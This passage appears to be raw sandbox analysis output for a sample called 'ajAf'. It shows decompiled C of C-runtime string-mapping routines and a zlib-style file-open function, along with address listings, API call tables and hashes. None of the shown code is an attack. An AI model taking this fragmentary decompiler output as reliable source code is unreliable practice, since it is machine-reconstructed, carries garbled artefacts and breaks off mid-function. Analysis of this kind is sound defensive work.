                                                          				signed int _v8;
                                                          				int _v12;
                                                          				int _v16;
                                                          				int _v20;
                                                          				intOrPtr _v24;
                                                          				void* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t110;
                                                          				intOrPtr _t112;
                                                          				intOrPtr _t113;
                                                          				short* _t115;
                                                          				short* _t116;
                                                          				char* _t120;
                                                          				short* _t121;
                                                          				short* _t123;
                                                          				short* _t127;
                                                          				int _t128;
                                                          				short* _t141;
                                                          				signed int _t144;
                                                          				void* _t146;
                                                          				short* _t147;
                                                          				signed int _t150;
                                                          				short* _t153;
                                                          				char* _t157;
                                                          				int _t160;
                                                          				long _t162;
                                                          				signed int _t174;
                                                          				signed int _t178;
                                                          				signed int _t179;
                                                          				int _t182;
                                                          				short* _t184;
                                                          				signed int _t186;
                                                          				signed int _t188;
                                                          				short* _t189;
                                                          				int _t191;
                                                          				intOrPtr _t194;
                                                          				int _t207;
                                                          
                                                          				_t110 =  *0x422234; // 0x99931ded
                                                          				_v8 = _t110 ^ _t188;
                                                          				_t184 = __ecx;
                                                          				_t194 =  *0x423e7c; // 0x1
                                                          				if(_t194 == 0) {
                                                          					_t182 = 1;
                                                          					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                          						_t162 = GetLastError();
                                                          						__eflags = _t162 - 0x78;
                                                          						if(_t162 == 0x78) {
                                                          							 *0x423e7c = 2;
                                                          						}
                                                          					} else {
                                                          						 *0x423e7c = 1;
                                                          					}
                                                          				}
                                                          				if(_a16 <= 0) {
                                                          					L13:
                                                          					_t112 =  *0x423e7c; // 0x1
                                                          					if(_t112 == 2 || _t112 == 0) {
                                                          						_v16 = 0;
                                                          						_v20 = 0;
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                          						}
                                                          						__eflags = _a28;
                                                          						if(_a28 == 0) {
                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                          						}
                                                          						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                          						_v24 = _t113;
                                                          						__eflags = _t113 - 0xffffffff;
                                                          						if(_t113 != 0xffffffff) {
                                                          							__eflags = _t113 - _a28;
                                                          							if(_t113 == _a28) {
                                                          								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                          								L78:
                                                          								__eflags = _v16;
                                                          								if(__eflags != 0) {
                                                          									_push(_v16);
                                                          									E0040B6B5(0, _t182, _t184, __eflags);
                                                          								}
                                                          								_t115 = _v20;
                                                          								__eflags = _t115;
                                                          								if(_t115 != 0) {
                                                          									__eflags = _a20 - _t115;
                                                          									if(__eflags != 0) {
                                                          										_push(_t115);
                                                          										E0040B6B5(0, _t182, _t184, __eflags);
                                                          									}
                                                          								}
                                                          								_t116 = _t184;
                                                          								goto L84;
                                                          							}
                                                          							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                          							_t191 =  &(_t189[0xc]);
                                                          							_v16 = _t120;
                                                          							__eflags = _t120;
                                                          							if(_t120 == 0) {
                                                          								goto L58;
                                                          							}
                                                          							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                          							_v12 = _t121;
                                                          							__eflags = _t121;
                                                          							if(__eflags != 0) {
                                                          								if(__eflags <= 0) {
                                                          									L71:
                                                          									_t182 = 0;
                                                          									__eflags = 0;
                                                          									L72:
                                                          									__eflags = _t182;
                                                          									if(_t182 == 0) {
                                                          										goto L62;
                                                          									}
                                                          									E0040BA30(_t182, _t182, 0, _v12);
                                                          									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                          									_v12 = _t123;
                                                          									__eflags = _t123;
                                                          									if(_t123 != 0) {
                                                          										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                          										_v20 = _t186;
                                                          										asm("sbb esi, esi");
                                                          										_t184 =  ~_t186 & _v12;
                                                          										__eflags = _t184;
                                                          									} else {
                                                          										_t184 = 0;
                                                          									}
                                                          									E004147AE(_t182);
                                                          									goto L78;
                                                          								}
                                                          								__eflags = _t121 - 0xffffffe0;
                                                          								if(_t121 > 0xffffffe0) {
                                                          									goto L71;
                                                          								}
                                                          								_t127 =  &(_t121[4]);
                                                          								__eflags = _t127 - 0x400;
                                                          								if(_t127 > 0x400) {
                                                          									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                          									__eflags = _t128;
                                                          									if(_t128 != 0) {
                                                          										 *_t128 = 0xdddd;
                                                          										_t128 = _t128 + 8;
                                                          										__eflags = _t128;
                                                          									}
                                                          									_t182 = _t128;
                                                          									goto L72;
                                                          								}
                                                          								E0040CFB0(_t127);
                                                          								_t182 = _t191;
                                                          								__eflags = _t182;
                                                          								if(_t182 == 0) {
                                                          									goto L62;
                                                          								}
                                                          								 *_t182 = 0xcccc;
                                                          								_t182 = _t182 + 8;
                                                          								goto L72;
                                                          							}
                                                          							L62:
                                                          							_t184 = 0;
                                                          							goto L78;
                                                          						} else {
                                                          							goto L58;
                                                          						}
                                                          					} else {
                                                          						if(_t112 != 1) {
                                                          							L58:
                                                          							_t116 = 0;
                                                          							L84:
                                                          							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                          						}
                                                          						_v12 = 0;
                                                          						if(_a28 == 0) {
                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                          						}
                                                          						_t184 = MultiByteToWideChar;
                                                          						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                          						_t207 = _t182;
                                                          						if(_t207 == 0) {
                                                          							goto L58;
                                                          						} else {
                                                          							if(_t207 <= 0) {
                                                          								L28:
                                                          								_v16 = 0;
                                                          								L29:
                                                          								if(_v16 == 0) {
                                                          									goto L58;
                                                          								}
                                                          								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                          									L52:
                                                          									E004147AE(_v16);
                                                          									_t116 = _v12;
                                                          									goto L84;
                                                          								}
                                                          								_t184 = LCMapStringW;
                                                          								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                          								_v12 = _t174;
                                                          								if(_t174 == 0) {
                                                          									goto L52;
                                                          								}
                                                          								if((_a8 & 0x00000400) == 0) {
                                                          									__eflags = _t174;
                                                          									if(_t174 <= 0) {
                                                          										L44:
                                                          										_t184 = 0;
                                                          										__eflags = 0;
                                                          										L45:
                                                          										__eflags = _t184;
                                                          										if(_t184 != 0) {
                                                          											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                          											__eflags = _t141;
                                                          											if(_t141 != 0) {
                                                          												_push(0);
                                                          												_push(0);
                                                          												__eflags = _a24;
                                                          												if(_a24 != 0) {
                                                          													_push(_a24);
                                                          													_push(_a20);
                                                          												} else {
                                                          													_push(0);
                                                          													_push(0);
                                                          												}
                                                          												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                          											}
                                                          											E004147AE(_t184);
                                                          										}
                                                          										goto L52;
                                                          									}
                                                          									_t144 = 0xffffffe0;
                                                          									_t179 = _t144 % _t174;
                                                          									__eflags = _t144 / _t174 - 2;
                                                          									if(_t144 / _t174 < 2) {
                                                          										goto L44;
                                                          									}
                                                          									_t52 = _t174 + 8; // 0x8
                                                          									_t146 = _t174 + _t52;
                                                          									__eflags = _t146 - 0x400;
                                                          									if(_t146 > 0x400) {
                                                          										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                          										__eflags = _t147;
                                                          										if(_t147 != 0) {
                                                          											 *_t147 = 0xdddd;
                                                          											_t147 =  &(_t147[4]);
                                                          											__eflags = _t147;
                                                          										}
                                                          										_t184 = _t147;
                                                          										goto L45;
                                                          									}
                                                          									E0040CFB0(_t146);
                                                          									_t184 = _t189;
                                                          									__eflags = _t184;
                                                          									if(_t184 == 0) {
                                                          										goto L52;
                                                          									}
                                                          									 *_t184 = 0xcccc;
                                                          									_t184 =  &(_t184[4]);
                                                          									goto L45;
                                                          								}
                                                          								if(_a24 != 0 && _t174 <= _a24) {
                                                          									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                          								}
                                                          								goto L52;
                                                          							}
                                                          							_t150 = 0xffffffe0;
                                                          							_t179 = _t150 % _t182;
                                                          							if(_t150 / _t182 < 2) {
                                                          								goto L28;
                                                          							}
                                                          							_t25 = _t182 + 8; // 0x8
                                                          							_t152 = _t182 + _t25;
                                                          							if(_t182 + _t25 > 0x400) {
                                                          								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                          								__eflags = _t153;
                                                          								if(_t153 == 0) {
                                                          									L27:
                                                          									_v16 = _t153;
                                                          									goto L29;
                                                          								}
                                                          								 *_t153 = 0xdddd;
                                                          								L26:
                                                          								_t153 =  &(_t153[4]);
                                                          								goto L27;
                                                          							}
                                                          							E0040CFB0(_t152);
                                                          							_t153 = _t189;
                                                          							if(_t153 == 0) {
                                                          								goto L27;
                                                          							}
                                                          							 *_t153 = 0xcccc;
                                                          							goto L26;
                                                          						}
                                                          					}
                                                          				}
                                                          				_t178 = _a16;
                                                          				_t157 = _a12;
                                                          				while(1) {
                                                          					_t178 = _t178 - 1;
                                                          					if( *_t157 == 0) {
                                                          						break;
                                                          					}
                                                          					_t157 =  &(_t157[1]);
                                                          					if(_t178 != 0) {
                                                          						continue;
                                                          					}
                                                          					_t178 = _t178 | 0xffffffff;
                                                          					break;
                                                          				}
                                                          				_t160 = _a16 - _t178 - 1;
                                                          				if(_t160 < _a16) {
                                                          					_t160 = _t160 + 1;
                                                          				}
                                                          				_a16 = _t160;
                                                          				goto L13;
                                                          			}











































                                                          0x00417089
                                                          0x00417090
                                                          0x00417098
                                                          0x0041709a
                                                          0x004170a0
                                                          0x004170a6
                                                          0x004170bb
                                                          0x004170c5
                                                          0x004170cb
                                                          0x004170ce
                                                          0x004170d0
                                                          0x004170d0
                                                          0x004170bd
                                                          0x004170bd
                                                          0x004170bd
                                                          0x004170bb
                                                          0x004170dd
                                                          0x00417101
                                                          0x00417101
                                                          0x00417109
                                                          0x004172bb
                                                          0x004172be
                                                          0x004172c1
                                                          0x004172c4
                                                          0x004172cb
                                                          0x004172cb
                                                          0x004172ce
                                                          0x004172d1
                                                          0x004172d8
                                                          0x004172d8
                                                          0x004172de
                                                          0x004172e4
                                                          0x004172e7
                                                          0x004172ea
                                                          0x004172f3
                                                          0x004172f6
                                                          0x004173ef
                                                          0x004173f1
                                                          0x004173f1
                                                          0x004173f4
                                                          0x004173f6
                                                          0x004173f9
                                                          0x004173fe
                                                          0x004173ff
                                                          0x00417402
                                                          0x00417404
                                                          0x00417406
                                                          0x00417409
                                                          0x0041740b
                                                          0x0041740c
                                                          0x00417411
                                                          0x00417409
                                                          0x00417412
                                                          0x00000000
                                                          0x00417412
                                                          0x00417309
                                                          0x0041730e
                                                          0x00417311
                                                          0x00417314
                                                          0x00417316
                                                          0x00000000
                                                          0x00000000
                                                          0x0041732a
                                                          0x0041732c
                                                          0x0041732f
                                                          0x00417331
                                                          0x0041733a
                                                          0x00417379
                                                          0x00417379
                                                          0x00417379
                                                          0x0041737b
                                                          0x0041737b
                                                          0x0041737d
                                                          0x00000000
                                                          0x00000000
                                                          0x00417384
                                                          0x0041739c
                                                          0x0041739e
                                                          0x004173a1
                                                          0x004173a3
                                                          0x004173bf
                                                          0x004173c1
                                                          0x004173c9
                                                          0x004173cb
                                                          0x004173cb
                                                          0x004173a5
                                                          0x004173a5
                                                          0x004173a5
                                                          0x004173cf
                                                          0x00000000
                                                          0x004173d4
                                                          0x0041733c
                                                          0x0041733f
                                                          0x00000000
                                                          0x00000000
                                                          0x00417341
                                                          0x00417344
                                                          0x00417349
                                                          0x00417362
                                                          0x00417368
                                                          0x0041736a
                                                          0x0041736c
                                                          0x00417372
                                                          0x00417372
                                                          0x00417372
                                                          0x00417375
                                                          0x00000000
                                                          0x00417375
                                                          0x0041734b
                                                          0x00417350
                                                          0x00417352
                                                          0x00417354
                                                          0x00000000
                                                          0x00000000
                                                          0x00417356
                                                          0x0041735c
                                                          0x00000000
                                                          0x0041735c
                                                          0x00417333
                                                          0x00417333
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00417117
                                                          0x0041711a
                                                          0x004172ec
                                                          0x004172ec
                                                          0x00417414
                                                          0x00417425
                                                          0x00417425
                                                          0x00417120
                                                          0x00417126
                                                          0x0041712d
                                                          0x0041712d
                                                          0x00417130
                                                          0x00417153
                                                          0x00417155
                                                          0x00417157
                                                          0x00000000
                                                          0x0041715d
                                                          0x0041715d
                                                          0x004171a2
                                                          0x004171a2
                                                          0x004171a5
                                                          0x004171a8
                                                          0x00000000
                                                          0x00000000
                                                          0x004171c1
                                                          0x004172aa
                                                          0x004172ad
                                                          0x004172b2
                                                          0x00000000
                                                          0x004172b5
                                                          0x004171c7
                                                          0x004171db
                                                          0x004171dd
                                                          0x004171e2
                                                          0x00000000
                                                          0x00000000
                                                          0x004171ef
                                                          0x0041721a
                                                          0x0041721c
                                                          0x00417263
                                                          0x00417263
                                                          0x00417263
                                                          0x00417265
                                                          0x00417265
                                                          0x00417267
                                                          0x00417277
                                                          0x0041727d
                                                          0x0041727f
                                                          0x00417281
                                                          0x00417282
                                                          0x00417283
                                                          0x00417286
                                                          0x0041728c
                                                          0x0041728f
                                                          0x00417288
                                                          0x00417288
                                                          0x00417289
                                                          0x00417289
                                                          0x004172a0
                                                          0x004172a0
                                                          0x004172a4
                                                          0x004172a9
                                                          0x00000000
                                                          0x00417267
                                                          0x00417222
                                                          0x00417223
                                                          0x00417225
                                                          0x00417228
                                                          0x00000000
                                                          0x00000000
                                                          0x0041722a
                                                          0x0041722a
                                                          0x0041722e
                                                          0x00417233
                                                          0x0041724c
                                                          0x00417252
                                                          0x00417254
                                                          0x00417256
                                                          0x0041725c
                                                          0x0041725c
                                                          0x0041725c
                                                          0x0041725f
                                                          0x00000000
                                                          0x0041725f
                                                          0x00417235
                                                          0x0041723a
                                                          0x0041723c
                                                          0x0041723e
                                                          0x00000000
                                                          0x00000000
                                                          0x00417240
                                                          0x00417246
                                                          0x00000000
                                                          0x00417246
                                                          0x004171f4
                                                          0x00417213
                                                          0x00417213
                                                          0x00000000
                                                          0x004171f4
                                                          0x00417163
                                                          0x00417164
                                                          0x00417169
                                                          0x00000000
                                                          0x00000000
                                                          0x0041716b
                                                          0x0041716b
                                                          0x00417174
                                                          0x0041718a
                                                          0x00417190
                                                          0x00417192
                                                          0x0041719d
                                                          0x0041719d
                                                          0x00000000
                                                          0x0041719d
                                                          0x00417194
                                                          0x0041719a
                                                          0x0041719a
                                                          0x00000000
                                                          0x0041719a
                                                          0x00417176
                                                          0x0041717b
                                                          0x0041717f
                                                          0x00000000
                                                          0x00000000
                                                          0x00417181
                                                          0x00000000
                                                          0x00417181
                                                          0x00417157
                                                          0x00417109
                                                          0x004170df
                                                          0x004170e2
                                                          0x004170e5
                                                          0x004170e5
                                                          0x004170e8
                                                          0x00000000
                                                          0x00000000
                                                          0x004170ea
                                                          0x004170ed
                                                          0x00000000
                                                          0x00000000
                                                          0x004170ef
                                                          0x00000000
                                                          0x004170ef
                                                          0x004170f7
                                                          0x004170fb
                                                          0x004170fd
                                                          0x004170fd
                                                          0x004170fe
                                                          0x00000000

                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022918B8), ref: 004170C5
                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                          • _malloc.LIBCMT ref: 0041718A
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                          • _malloc.LIBCMT ref: 0041724C
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                          • __freea.LIBCMT ref: 004172A4
                                                          • __freea.LIBCMT ref: 004172AD
                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                          • ___convertcp.LIBCMT ref: 00417309
                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                          • _malloc.LIBCMT ref: 00417362
                                                          • _memset.LIBCMT ref: 00417384
                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                          • __freea.LIBCMT ref: 004173CF
                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                          • String ID:
                                                          • API String ID: 3809854901-0
                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 01FD731A
                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 01FD732C
                                                          • _malloc.LIBCMT ref: 01FD73F1
                                                          • _malloc.LIBCMT ref: 01FD74B3
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 01FD74DE
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 01FD7501
                                                          • __freea.LIBCMT ref: 01FD750B
                                                          • __freea.LIBCMT ref: 01FD7514
                                                          • ___ansicp.LIBCMT ref: 01FD7545
                                                          • ___convertcp.LIBCMT ref: 01FD7570
                                                          • _malloc.LIBCMT ref: 01FD75C9
                                                          • _memset.LIBCMT ref: 01FD75EB
                                                          • ___convertcp.LIBCMT ref: 01FD7621
                                                          • __freea.LIBCMT ref: 01FD7636
                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 01FD7650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                          • String ID: pWhvPMhv Uhv Ohv FwIhvThv
                                                          • API String ID: 2918745354-2975966627
                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction ID: 0ee8a039f8f4e8901ccc45db402ea0c7228644e356c9861d4dde0e73097ba10c
                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction Fuzzy Hash: B2B1F472D0015AEFDF12AFA8CC809BE7FB7EB48358B584629FA15AB110D732C950DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,01FD0977,00000000,00000000,?,00000001,01FCC22D,01FCB993), ref: 01FD084E
                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 01FD0859
                                                            • Part of subcall function 01FCE9D1: Sleep.KERNEL32(000003E8,00000000,?,01FD079F,KERNEL32.DLL,?,01FD07EB,?,00000001,01FCC22D,01FCB993), ref: 01FCE9DD
                                                            • Part of subcall function 01FCE9D1: GetModuleHandleW.KERNEL32(00000001,?,01FD079F,KERNEL32.DLL,?,01FD07EB,?,00000001,01FCC22D,01FCB993), ref: 01FCE9E6
                                                          • __lock.LIBCMT ref: 01FD08B4
                                                          • InterlockedIncrement.KERNEL32(?), ref: 01FD08C1
                                                          • __lock.LIBCMT ref: 01FD08D5
                                                          • ___addlocaleref.LIBCMT ref: 01FD08F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                          • String ID: @.B$KERNEL32.DLL
                                                          • API String ID: 4021795732-2520587274
                                                          • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                          • Instruction ID: f834cd2a62b9f148e1f8f2647c2f5993064816eec6c70b141f80179c9f87e8a8
                                                          • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                          • Instruction Fuzzy Hash: 2011C071900702EED720EF39DD0079ABBE0AF14310F10452EE4AA936A1CB759641CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E004057B0(intOrPtr* __eax) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t57;
                                                          				char* _t60;
                                                          				char _t62;
                                                          				intOrPtr _t63;
                                                          				char _t64;
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t70;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t79;
                                                          				intOrPtr _t82;
                                                          				intOrPtr* _t83;
                                                          				void* _t86;
                                                          				char* _t88;
                                                          				char* _t89;
                                                          				intOrPtr* _t91;
                                                          				intOrPtr* _t93;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				void* _t100;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t104;
                                                          
                                                          				_t98 = _t97 | 0xffffffff;
                                                          				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                          				_t91 = __eax;
                                                          				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                          				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                          					__eflags = 0;
                                                          					return 0;
                                                          				} else {
                                                          					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                          					_t101 = _t100 + 4;
                                                          					if(_t93 == 0) {
                                                          						L31:
                                                          						return 0;
                                                          					} else {
                                                          						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                          						 *_t93 = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                          						 *(_t93 + 0x6c) = _t98;
                                                          						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                          						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                          						_t102 = _t101 + 0xc;
                                                          						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                          						_t87 = _t57 + 1;
                                                          						do {
                                                          							_t82 =  *_t57;
                                                          							_t57 = _t57 + 1;
                                                          						} while (_t82 != 0);
                                                          						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                          						_t103 = _t102 + 4;
                                                          						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                          						if(_t60 == 0) {
                                                          							L30:
                                                          							E00405160(0, _t87, _t93);
                                                          							goto L31;
                                                          						} else {
                                                          							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                          							_t88 = _t60;
                                                          							goto L7;
                                                          							L9:
                                                          							L9:
                                                          							if( *_t91 == 0x72) {
                                                          								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                          							}
                                                          							_t63 =  *_t91;
                                                          							if(_t63 == 0x77 || _t63 == 0x61) {
                                                          								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                          							}
                                                          							_t64 =  *_t91;
                                                          							if(_t64 < 0x30 || _t64 > 0x39) {
                                                          								__eflags = _t64 - 0x66;
                                                          								if(_t64 != 0x66) {
                                                          									__eflags = _t64 - 0x68;
                                                          									if(_t64 != 0x68) {
                                                          										__eflags = _t64 - 0x52;
                                                          										if(_t64 != 0x52) {
                                                          											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                          											 *_t89 = _t64;
                                                          											_t87 = _t89 + 1;
                                                          											__eflags = _t87;
                                                          											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                          										} else {
                                                          											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                          										}
                                                          									} else {
                                                          										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                          									}
                                                          								} else {
                                                          									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                          								}
                                                          							} else {
                                                          								_t98 = _t64 - 0x30;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							if(_t64 == 0) {
                                                          								goto L26;
                                                          							}
                                                          							_t87 = _t103 + 0x68;
                                                          							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                          								goto L9;
                                                          							}
                                                          							L26:
                                                          							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                          							if(_t65 == 0) {
                                                          								goto L30;
                                                          							} else {
                                                          								if(_t65 != 0x77) {
                                                          									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                          									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                          									 *_t93 = _t66;
                                                          									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                          									_t104 = _t103 + 0x14;
                                                          									__eflags = _t67;
                                                          									if(_t67 != 0) {
                                                          										goto L30;
                                                          									} else {
                                                          										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                          										if(__eflags == 0) {
                                                          											goto L30;
                                                          										} else {
                                                          											goto L34;
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_push(0x38);
                                                          									_push("1.2.3");
                                                          									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                          									_push(8);
                                                          									_push(0xfffffff1);
                                                          									_push(8);
                                                          									_push(_t98);
                                                          									_push(_t93);
                                                          									_t91 = E00404CE0();
                                                          									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                          									_t104 = _t103 + 0x24;
                                                          									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                          									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                          									if(_t91 != 0 || _t79 == 0) {
                                                          										goto L30;
                                                          									} else {
                                                          										L34:
                                                          										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
